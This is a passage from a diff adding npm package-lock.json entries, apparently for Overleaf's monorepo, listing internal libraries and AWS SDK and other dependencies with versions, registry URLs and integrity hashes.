"sha512-WaEtAOpRA1MQ0eohqZjpGD8zdI0Ovsm8mmFhaDN8dvDZzyoUMcYDnf5Y6iu7HTXxf8JDS23qWa4a+hKCDyOPzw==", + "dev": true, + "dependencies": { + "type-detect": "^4.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "libraries/promise-utils/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "libraries/ranges-tracker": { + "name": "@overleaf/ranges-tracker", + "devDependencies": { + "chai": "^4.3.6", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "libraries/redis-wrapper": { + "name": "@overleaf/redis-wrapper", + 
"version": "2.1.0", + "license": "ISC", + "dependencies": { + "async": "^3.2.5", + "ioredis": "~4.27.1" + }, + "devDependencies": { + "@overleaf/logger": "*", + "@overleaf/o-error": "*", + "chai": "^4.3.6", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + }, + "peerDependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*" + } + }, + "libraries/settings": { + "name": "@overleaf/settings", + "version": "3.0.0", + "devDependencies": { + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "libraries/stream-utils": { + "name": "@overleaf/stream-utils", + "version": "0.1.0", + "license": "AGPL-3.0-only", + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "node_modules/@aashutoshrathi/word-wrap": { + "version": "1.2.6", + "resolved": "https://registry.npmjs.org/@aashutoshrathi/word-wrap/-/word-wrap-1.2.6.tgz", + "integrity": "sha512-1Yjs2SvM8TflER/OD3cOjhWWOZb58A2t7wpE2S9XfBYTiIl+XFhQG2bjy4Pu1I+EAlCNUzRDYDdFwFYUKvXcIA==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/@adobe/css-tools": { + "version": "4.4.2", + "resolved": "https://registry.npmjs.org/@adobe/css-tools/-/css-tools-4.4.2.tgz", + "integrity": "sha512-baYZExFpsdkBNuvGKTKWCwKH57HRZLVtycZS05WTQNVOiXVSeAki3nU35zlRbToeMW8aHlJfyS+1C4BOv27q0A==", + "dev": true, + "license": "MIT" + }, + "node_modules/@ampproject/remapping": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", + "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", + "dev": true, + "dependencies": { + "@jridgewell/gen-mapping": "^0.3.0", + "@jridgewell/trace-mapping": "^0.3.9" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@apidevtools/json-schema-ref-parser": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/@apidevtools/json-schema-ref-parser/-/json-schema-ref-parser-9.1.0.tgz", + "integrity": "sha512-teB30tFooE3iQs2HQIKJ02D8UZA1Xy1zaczzhUjJs0CymYxeC0g+y5rCY2p8NHBM6DBUVoR8rSM4kHLj1WE9mQ==", + "dependencies": { + "@jsdevtools/ono": "^7.1.3", + "@types/json-schema": "^7.0.6", + "call-me-maybe": "^1.0.1", + "js-yaml": "^4.1.0" + } + }, + "node_modules/@arrows/array": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/@arrows/array/-/array-1.4.1.tgz", + "integrity": "sha512-MGYS8xi3c4tTy1ivhrVntFvufoNzje0PchjEz6G/SsWRgUKxL4tKwS6iPdO8vsaJYldagAeWMd5KRD0aX3Q39g==", + "dev": true, + "dependencies": { + "@arrows/composition": "^1.2.2" + } + }, + "node_modules/@arrows/composition": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/@arrows/composition/-/composition-1.2.2.tgz", + "integrity": "sha512-9fh1yHwrx32lundiB3SlZ/VwuStPB4QakPsSLrGJFH6rCXvdrd060ivAZ7/2vlqPnEjBkPRRXOcG1YOu19p2GQ==", + "dev": true + }, + "node_modules/@arrows/dispatch": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/@arrows/dispatch/-/dispatch-1.0.3.tgz", + "integrity": "sha512-v/HwvrFonitYZM2PmBlAlCqVqxrkIIoiEuy5bQgn0BdfvlL0ooSBzcPzTMrtzY8eYktPyYcHg8fLbSgyybXEqw==", + "dev": true, + "dependencies": { + "@arrows/composition": "^1.2.2" + } + }, + "node_modules/@arrows/error": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@arrows/error/-/error-1.0.2.tgz", + "integrity": "sha512-yvkiv1ay4Z3+Z6oQsUkedsQm5aFdyPpkBUQs8vejazU/RmANABx6bMMcBPPHI4aW43VPQmXFfBzr/4FExwWTEA==", + "dev": true + }, + 
"node_modules/@arrows/multimethod": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/@arrows/multimethod/-/multimethod-1.4.1.tgz", + "integrity": "sha512-AZnAay0dgPnCJxn3We5uKiB88VL+1ZIF2SjZohLj6vqY2UyvB/sKdDnFP+LZNVsTC5lcnGPmLlRRkAh4sXkXsQ==", + "dev": true, + "dependencies": { + "@arrows/array": "^1.4.1", + "@arrows/composition": "^1.2.2", + "@arrows/error": "^1.0.2", + "fast-deep-equal": "^3.1.3" + } + }, + "node_modules/@auth0/thumbprint": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/@auth0/thumbprint/-/thumbprint-0.0.6.tgz", + "integrity": "sha1-yrEGLGwEZizmxZLUgVfsQmiuhRg=" + }, + "node_modules/@auth0/xmldom": { + "version": "0.1.21", + "resolved": "https://registry.npmjs.org/@auth0/xmldom/-/xmldom-0.1.21.tgz", + "integrity": "sha512-//QqjkvBknF7j0Nf205o5wgUMnq8ioHHxEr61OZQ3J0RXGFvs2rb5GLZ8jdNxMqYz4n/PEsbFIQL5RHBixxq5g==", + "engines": { + "node": ">=0.1" + } + }, + "node_modules/@aws-crypto/crc32": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@aws-crypto/crc32/-/crc32-3.0.0.tgz", + "integrity": "sha512-IzSgsrxUcsrejQbPVilIKy16kAT52EwB6zSaI+M3xxIhKh5+aldEyvI+z6erM7TCLB2BJsFrtHjp6/4/sr+3dA==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-crypto/util": "^3.0.0", + "@aws-sdk/types": "^3.222.0", + "tslib": "^1.11.1" + } + }, + "node_modules/@aws-crypto/crc32/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "optional": true, + "peer": true + }, + "node_modules/@aws-crypto/ie11-detection": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@aws-crypto/ie11-detection/-/ie11-detection-3.0.0.tgz", + "integrity": "sha512-341lBBkiY1DfDNKai/wXM3aujNBkXR7tq1URPQDL9wi3AUbI80NR74uF1TXHMm7po1AcnFk8iu2S2IeU/+/A+Q==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^1.11.1" + } + }, + "node_modules/@aws-crypto/ie11-detection/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "optional": true, + "peer": true + }, + "node_modules/@aws-crypto/sha256-browser": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@aws-crypto/sha256-browser/-/sha256-browser-3.0.0.tgz", + "integrity": "sha512-8VLmW2B+gjFbU5uMeqtQM6Nj0/F1bro80xQXCW6CQBWgosFWXTx77aeOF5CAIAmbOK64SdMBJdNr6J41yP5mvQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-crypto/ie11-detection": "^3.0.0", + "@aws-crypto/sha256-js": "^3.0.0", + "@aws-crypto/supports-web-crypto": "^3.0.0", + "@aws-crypto/util": "^3.0.0", + "@aws-sdk/types": "^3.222.0", + "@aws-sdk/util-locate-window": "^3.0.0", + "@aws-sdk/util-utf8-browser": "^3.0.0", + "tslib": "^1.11.1" + } + }, + "node_modules/@aws-crypto/sha256-browser/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "optional": true, + "peer": true + }, + "node_modules/@aws-crypto/sha256-js": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@aws-crypto/sha256-js/-/sha256-js-3.0.0.tgz", + "integrity": "sha512-PnNN7os0+yd1XvXAy23CFOmTbMaDxgxXtTKHybrJ39Y8kGzBATgBFibWJKH6BhytLI/Zyszs87xCOBNyBig6vQ==", + "optional": true, + 
"peer": true, + "dependencies": { + "@aws-crypto/util": "^3.0.0", + "@aws-sdk/types": "^3.222.0", + "tslib": "^1.11.1" + } + }, + "node_modules/@aws-crypto/sha256-js/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "optional": true, + "peer": true + }, + "node_modules/@aws-crypto/supports-web-crypto": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@aws-crypto/supports-web-crypto/-/supports-web-crypto-3.0.0.tgz", + "integrity": "sha512-06hBdMwUAb2WFTuGG73LSC0wfPu93xWwo5vL2et9eymgmu3Id5vFAHBbajVWiGhPO37qcsdCap/FqXvJGJWPIg==", + "optional": true, + "peer": true, + "dependencies": { + "tslib": "^1.11.1" + } + }, + "node_modules/@aws-crypto/supports-web-crypto/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "optional": true, + "peer": true + }, + "node_modules/@aws-crypto/util": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@aws-crypto/util/-/util-3.0.0.tgz", + "integrity": "sha512-2OJlpeJpCR48CC8r+uKVChzs9Iungj9wkZrl8Z041DWEWvyIHILYKCPNzJghKsivj+S3mLo6BVc7mBNzdxA46w==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "^3.222.0", + "@aws-sdk/util-utf8-browser": "^3.0.0", + "tslib": "^1.11.1" + } + }, + "node_modules/@aws-crypto/util/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "optional": true, + "peer": true + }, + "node_modules/@aws-sdk/client-cognito-identity": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/client-cognito-identity/-/client-cognito-identity-3.363.0.tgz", + "integrity": "sha512-tsJzgBSCpna85IVsuS7FBIK9wkSl7fs8TJ/QzapIgu8rKss0ySHVO6TeMVAdw2BvaQl7CxU9c3PosjhLWHu6KQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-crypto/sha256-browser": "3.0.0", + "@aws-crypto/sha256-js": "3.0.0", + "@aws-sdk/client-sts": "3.363.0", + "@aws-sdk/credential-provider-node": "3.363.0", + "@aws-sdk/middleware-host-header": "3.363.0", + "@aws-sdk/middleware-logger": "3.363.0", + "@aws-sdk/middleware-recursion-detection": "3.363.0", + "@aws-sdk/middleware-signing": "3.363.0", + "@aws-sdk/middleware-user-agent": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@aws-sdk/util-endpoints": "3.357.0", + "@aws-sdk/util-user-agent-browser": "3.363.0", + "@aws-sdk/util-user-agent-node": "3.363.0", + "@smithy/config-resolver": "^1.0.1", + "@smithy/fetch-http-handler": "^1.0.1", + "@smithy/hash-node": "^1.0.1", + "@smithy/invalid-dependency": "^1.0.1", + "@smithy/middleware-content-length": "^1.0.1", + "@smithy/middleware-endpoint": "^1.0.1", + "@smithy/middleware-retry": "^1.0.2", + "@smithy/middleware-serde": "^1.0.1", + "@smithy/middleware-stack": "^1.0.1", + "@smithy/node-config-provider": "^1.0.1", + "@smithy/node-http-handler": "^1.0.2", + "@smithy/protocol-http": "^1.0.1", + "@smithy/smithy-client": "^1.0.3", + "@smithy/types": "^1.0.0", + "@smithy/url-parser": "^1.0.1", + "@smithy/util-base64": "^1.0.1", + "@smithy/util-body-length-browser": "^1.0.1", + "@smithy/util-body-length-node": "^1.0.1", + "@smithy/util-defaults-mode-browser": "^1.0.1", + 
"@smithy/util-defaults-mode-node": "^1.0.1", + "@smithy/util-retry": "^1.0.2", + "@smithy/util-utf8": "^1.0.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/client-sso": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/client-sso/-/client-sso-3.363.0.tgz", + "integrity": "sha512-PZ+HfKSgS4hlMnJzG+Ev8/mgHd/b/ETlJWPSWjC/f2NwVoBQkBnqHjdyEx7QjF6nksJozcVh5Q+kkYLKc/QwBQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-crypto/sha256-browser": "3.0.0", + "@aws-crypto/sha256-js": "3.0.0", + "@aws-sdk/middleware-host-header": "3.363.0", + "@aws-sdk/middleware-logger": "3.363.0", + "@aws-sdk/middleware-recursion-detection": "3.363.0", + "@aws-sdk/middleware-user-agent": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@aws-sdk/util-endpoints": "3.357.0", + "@aws-sdk/util-user-agent-browser": "3.363.0", + "@aws-sdk/util-user-agent-node": "3.363.0", + "@smithy/config-resolver": "^1.0.1", + "@smithy/fetch-http-handler": "^1.0.1", + "@smithy/hash-node": "^1.0.1", + "@smithy/invalid-dependency": "^1.0.1", + "@smithy/middleware-content-length": "^1.0.1", + "@smithy/middleware-endpoint": "^1.0.1", + "@smithy/middleware-retry": "^1.0.2", + "@smithy/middleware-serde": "^1.0.1", + "@smithy/middleware-stack": "^1.0.1", + "@smithy/node-config-provider": "^1.0.1", + "@smithy/node-http-handler": "^1.0.2", + "@smithy/protocol-http": "^1.0.1", + "@smithy/smithy-client": "^1.0.3", + "@smithy/types": "^1.0.0", + "@smithy/url-parser": "^1.0.1", + "@smithy/util-base64": "^1.0.1", + "@smithy/util-body-length-browser": "^1.0.1", + "@smithy/util-body-length-node": "^1.0.1", + "@smithy/util-defaults-mode-browser": "^1.0.1", + "@smithy/util-defaults-mode-node": "^1.0.1", + "@smithy/util-retry": "^1.0.2", + "@smithy/util-utf8": "^1.0.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/client-sso-oidc": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/client-sso-oidc/-/client-sso-oidc-3.363.0.tgz", + "integrity": "sha512-V3Ebiq/zNtDS/O92HUWGBa7MY59RYSsqWd+E0XrXv6VYTA00RlMTbNcseivNgp2UghOgB9a20Nkz6EqAeIN+RQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-crypto/sha256-browser": "3.0.0", + "@aws-crypto/sha256-js": "3.0.0", + "@aws-sdk/middleware-host-header": "3.363.0", + "@aws-sdk/middleware-logger": "3.363.0", + "@aws-sdk/middleware-recursion-detection": "3.363.0", + "@aws-sdk/middleware-user-agent": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@aws-sdk/util-endpoints": "3.357.0", + "@aws-sdk/util-user-agent-browser": "3.363.0", + "@aws-sdk/util-user-agent-node": "3.363.0", + "@smithy/config-resolver": "^1.0.1", + "@smithy/fetch-http-handler": "^1.0.1", + "@smithy/hash-node": "^1.0.1", + "@smithy/invalid-dependency": "^1.0.1", + "@smithy/middleware-content-length": "^1.0.1", + "@smithy/middleware-endpoint": "^1.0.1", + "@smithy/middleware-retry": "^1.0.2", + "@smithy/middleware-serde": "^1.0.1", + "@smithy/middleware-stack": "^1.0.1", + "@smithy/node-config-provider": "^1.0.1", + "@smithy/node-http-handler": "^1.0.2", + "@smithy/protocol-http": "^1.0.1", + "@smithy/smithy-client": "^1.0.3", + "@smithy/types": "^1.0.0", + "@smithy/url-parser": "^1.0.1", + "@smithy/util-base64": "^1.0.1", + "@smithy/util-body-length-browser": "^1.0.1", + "@smithy/util-body-length-node": "^1.0.1", + "@smithy/util-defaults-mode-browser": "^1.0.1", + "@smithy/util-defaults-mode-node": "^1.0.1", + "@smithy/util-retry": "^1.0.2", + "@smithy/util-utf8": "^1.0.1", + 
"tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/client-sts": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/client-sts/-/client-sts-3.363.0.tgz", + "integrity": "sha512-0jj14WvBPJQ8xr72cL0mhlmQ90tF0O0wqXwSbtog6PsC8+KDE6Yf+WsxsumyI8E5O8u3eYijBL+KdqG07F/y/w==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-crypto/sha256-browser": "3.0.0", + "@aws-crypto/sha256-js": "3.0.0", + "@aws-sdk/credential-provider-node": "3.363.0", + "@aws-sdk/middleware-host-header": "3.363.0", + "@aws-sdk/middleware-logger": "3.363.0", + "@aws-sdk/middleware-recursion-detection": "3.363.0", + "@aws-sdk/middleware-sdk-sts": "3.363.0", + "@aws-sdk/middleware-signing": "3.363.0", + "@aws-sdk/middleware-user-agent": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@aws-sdk/util-endpoints": "3.357.0", + "@aws-sdk/util-user-agent-browser": "3.363.0", + "@aws-sdk/util-user-agent-node": "3.363.0", + "@smithy/config-resolver": "^1.0.1", + "@smithy/fetch-http-handler": "^1.0.1", + "@smithy/hash-node": "^1.0.1", + "@smithy/invalid-dependency": "^1.0.1", + "@smithy/middleware-content-length": "^1.0.1", + "@smithy/middleware-endpoint": "^1.0.1", + "@smithy/middleware-retry": "^1.0.1", + "@smithy/middleware-serde": "^1.0.1", + "@smithy/middleware-stack": "^1.0.1", + "@smithy/node-config-provider": "^1.0.1", + "@smithy/node-http-handler": "^1.0.1", + "@smithy/protocol-http": "^1.1.0", + "@smithy/smithy-client": "^1.0.2", + "@smithy/types": "^1.1.0", + "@smithy/url-parser": "^1.0.1", + "@smithy/util-base64": "^1.0.1", + "@smithy/util-body-length-browser": "^1.0.1", + "@smithy/util-body-length-node": "^1.0.1", + "@smithy/util-defaults-mode-browser": "^1.0.1", + "@smithy/util-defaults-mode-node": "^1.0.1", + "@smithy/util-retry": "^1.0.1", + "@smithy/util-utf8": "^1.0.1", + "fast-xml-parser": "4.2.5", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/credential-provider-cognito-identity": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-cognito-identity/-/credential-provider-cognito-identity-3.363.0.tgz", + "integrity": "sha512-5x42JvqEsBUrm6/qdf0WWe4mlmJjPItxamQhRjuOzeQD/BxsA2W5VS/7n0Ws0e27DNhlnUErcIJd+bBy6j1fqA==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/client-cognito-identity": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@smithy/property-provider": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/credential-provider-env": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-env/-/credential-provider-env-3.363.0.tgz", + "integrity": "sha512-VAQ3zITT2Q0acht0HezouYnMFKZ2vIOa20X4zQA3WI0HfaP4D6ga6KaenbDcb/4VFiqfqiRHfdyXHP0ThcDRMA==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/property-provider": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/credential-provider-ini": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-ini/-/credential-provider-ini-3.363.0.tgz", + "integrity": "sha512-ZYN+INoqyX5FVC3rqUxB6O8nOWkr0gHRRBm1suoOlmuFJ/WSlW/uUGthRBY5x1AQQnBF8cpdlxZzGHd41lFVNw==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/credential-provider-env": "3.363.0", + "@aws-sdk/credential-provider-process": 
"3.363.0", + "@aws-sdk/credential-provider-sso": "3.363.0", + "@aws-sdk/credential-provider-web-identity": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@smithy/credential-provider-imds": "^1.0.1", + "@smithy/property-provider": "^1.0.1", + "@smithy/shared-ini-file-loader": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/credential-provider-node": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-node/-/credential-provider-node-3.363.0.tgz", + "integrity": "sha512-C1qXFIN2yMxD6pGgug0vR1UhScOki6VqdzuBHzXZAGu7MOjvgHNdscEcb3CpWnITHaPL2ztkiw75T1sZ7oIgQg==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/credential-provider-env": "3.363.0", + "@aws-sdk/credential-provider-ini": "3.363.0", + "@aws-sdk/credential-provider-process": "3.363.0", + "@aws-sdk/credential-provider-sso": "3.363.0", + "@aws-sdk/credential-provider-web-identity": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@smithy/credential-provider-imds": "^1.0.1", + "@smithy/property-provider": "^1.0.1", + "@smithy/shared-ini-file-loader": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/credential-provider-process": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-process/-/credential-provider-process-3.363.0.tgz", + "integrity": "sha512-fOKAINU7Rtj2T8pP13GdCt+u0Ml3gYynp8ki+1jMZIQ+Ju/MdDOqZpKMFKicMn3Z1ttUOgqr+grUdus6z8ceBQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/property-provider": "^1.0.1", + "@smithy/shared-ini-file-loader": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/credential-provider-sso": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-sso/-/credential-provider-sso-3.363.0.tgz", + "integrity": "sha512-5RUZ5oM0lwZSo3EehT0dXggOjgtxFogpT3cZvoLGtIwrPBvm8jOQPXQUlaqCj10ThF1sYltEyukz/ovtDwYGew==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/client-sso": "3.363.0", + "@aws-sdk/token-providers": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@smithy/property-provider": "^1.0.1", + "@smithy/shared-ini-file-loader": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/credential-provider-web-identity": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-web-identity/-/credential-provider-web-identity-3.363.0.tgz", + "integrity": "sha512-Z6w7fjgy79pAax580wdixbStQw10xfyZ+hOYLcPudoYFKjoNx0NQBejg5SwBzCF/HQL23Ksm9kDfbXDX9fkPhA==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/property-provider": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/credential-providers": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-providers/-/credential-providers-3.363.0.tgz", + "integrity": "sha512-hVa1DdYasnLud2EKjDAlDHiV/+H/Zq52chHU00c/R8XwPu1s0kZX3NMmlt0D2HhYqC1mUwtdmE58Jra2POviQQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/client-cognito-identity": "3.363.0", + "@aws-sdk/client-sso": "3.363.0", + "@aws-sdk/client-sts": "3.363.0", + 
"@aws-sdk/credential-provider-cognito-identity": "3.363.0", + "@aws-sdk/credential-provider-env": "3.363.0", + "@aws-sdk/credential-provider-ini": "3.363.0", + "@aws-sdk/credential-provider-node": "3.363.0", + "@aws-sdk/credential-provider-process": "3.363.0", + "@aws-sdk/credential-provider-sso": "3.363.0", + "@aws-sdk/credential-provider-web-identity": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@smithy/credential-provider-imds": "^1.0.1", + "@smithy/property-provider": "^1.0.1", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/middleware-host-header": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-host-header/-/middleware-host-header-3.363.0.tgz", + "integrity": "sha512-FobpclDCf5Y1ueyJDmb9MqguAdPssNMlnqWQpujhYVABq69KHu73fSCWSauFPUrw7YOpV8kG1uagDF0POSxHzA==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/protocol-http": "^1.1.0", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/middleware-logger": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-logger/-/middleware-logger-3.363.0.tgz", + "integrity": "sha512-SSGgthScYnFGTOw8EzbkvquqweFmvn7uJihkpFekbtBNGC/jGOGO+8ziHjTQ8t/iI/YKubEwv+LMi0f77HKSEg==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/middleware-recursion-detection": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-recursion-detection/-/middleware-recursion-detection-3.363.0.tgz", + "integrity": "sha512-MWD/57QgI/N7fG8rtzDTUdSqNpYohQfgj9XCFAoVeI/bU4usrkOrew43L4smJG4XrDxlNT8lSJlDtd64tuiUZA==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/protocol-http": "^1.1.0", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/middleware-sdk-sts": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-sdk-sts/-/middleware-sdk-sts-3.363.0.tgz", + "integrity": "sha512-1yy2Ac50FO8BrODaw5bPWvVrRhaVLqXTFH6iHB+dJLPUkwtY5zLM3Mp+9Ilm7kME+r7oIB1wuO6ZB1Lf4ZszIw==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/middleware-signing": "3.363.0", + "@aws-sdk/types": "3.357.0", + "@smithy/types": "^1.1.0", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/middleware-signing": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-signing/-/middleware-signing-3.363.0.tgz", + "integrity": "sha512-/7qia715pt9JKYIPDGu22WmdZxD8cfF/5xB+1kmILg7ZtjO0pPuTaCNJ7xiIuFd7Dn7JXp5lop08anX/GOhNRQ==", + "optional": true, + "peer": true, + "dependencies": { + "@aws-sdk/types": "3.357.0", + "@smithy/property-provider": "^1.0.1", + "@smithy/protocol-http": "^1.1.0", + "@smithy/signature-v4": "^1.0.1", + "@smithy/types": "^1.1.0", + "@smithy/util-middleware": "^1.0.1", + "tslib": "^2.5.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@aws-sdk/middleware-user-agent": { + "version": "3.363.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-user-agent/-/middleware-user-agent-3.363.0.tgz", + "integrity": 
